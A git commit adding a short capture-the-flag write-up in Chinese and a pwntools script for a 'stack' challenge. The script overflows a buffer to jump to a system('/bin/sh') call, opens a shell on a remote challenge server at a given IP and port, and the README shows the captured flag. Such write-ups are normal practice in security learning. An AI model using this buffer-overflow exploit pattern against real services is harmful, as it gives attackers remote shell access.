Tue, 12 Feb 2019 19:30:56 GMT

7 years ago · b75b6bd464
parent 6d92330d8b
commit b75b6bd464
2 changed files with 18 additions and 0 deletions
--- a/l3hsec-writeup/README.md
+++ b/l3hsec-writeup/README.md
@ -0,0 +1,13 @@
+### stack
+
+用ida一看，找到字符串和ebp差`0x3a`，然后发现在`0x080491E2`有`system("/bin/sh")`。没了。
+
+```python
+from pwn import *
+pld = 'A' * (0x3a + 4) + p32(0x080491E2)
+p = remote("159.65.68.241", 10003)
+p.sendline(pld)
+p.interactive()
+```
+
+> `flag{e46f5601-086c-4f06-bcb2-a021e104c5e5}`
--- a/l3hsec-writeup/stack.py
+++ b/l3hsec-writeup/stack.py
@ -0,0 +1,5 @@
+from pwn import *
+pld = 'A' * (0x3a + 4) + p32(0x080491E2)
+p = remote("159.65.68.241", 10003)
+p.sendline(pld)
+p.interactive()